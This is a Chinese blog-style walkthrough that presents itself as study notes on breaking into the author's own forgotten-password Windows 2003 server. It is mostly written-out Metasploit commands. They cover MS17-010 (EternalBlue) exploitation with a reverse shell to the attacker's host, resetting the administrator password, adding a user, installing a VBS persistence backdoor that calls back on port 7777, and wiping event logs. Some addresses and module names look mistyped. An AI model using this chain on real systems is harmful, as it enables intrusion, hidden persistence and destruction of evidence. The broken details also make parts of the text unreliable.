声明:此篇内容仅作学习记录和技术总结,读者不得使用文中内容进行非法测试,违者自负。
一、前言
许久未用的服务器忘记密码,尝试几次无果后,决定自己打进去看看。
二、信息收集
1.主机发现
查看网卡所在网段为192.168.0.0/24
nmap 192.168.0.0/24
arp-scan 192.168.0.0/24
netdiscover -i eth0 -r 192.168.0.0/24
使用msf中的模块
use>auxiliary/scanner/discovery/arp_sweep //使用辅助模块
set RHOSTS > 192.168.0.0/24 //设置扫描的网段
run
Win2003的IP为0.1
2.端口扫描(服务查点)
搜索一下portscan工具
search type:auxiliary path:portscan
使用第6个syn半连接扫描
设置目标地址
set RHOST > 192.168.0.1
run
只扫描出两个TCP的端口
使用Nmap扫描,结果还是很可观的。
nmap -sV -T4 192.168.0.1
目标445端口(SMB文件共享服务)是开放的,尝试使用永恒之蓝(MS17-010)干它一下
3.漏洞扫描
先扫描一下目标主机是否存在此漏洞
msf6 > search ms17-010
use 4 auxiliary/sacnner/smb/smb_ms17_010
set RHOST 192.168.0.1
run
结果显示漏洞可能(大概率)存在,并且将服务器的系统版本也列了出来
4.漏洞利用
使用第2个exploit,默认的反弹地址为127.0.0.1(loop back),需要改下设置
use 2 exploit/windows/smb/smb_ms17_010
set rhost 192.168.0.1
set lhost 192.169.0.10 //设置shell反弹地址为本机kali
set lport 默认端口为4444,如无占用可不修改
run
成功拿下system32最高权限
查看IP和账号信息,有个管理员账号
修改管理员账号为123.com,创建一个future用户登录查看
成功进入!
5.权限维持
目标主机C:\windows\temp目录下,产生一个.Vbs的脚本,实现开机自动运行。在kali上监听7777端口,等待反弹对话。
run persistence -S -U -X -i 3 -p 7777 -r 192.168.0.1
6.痕迹清除
C:\Windows\system32 > clearev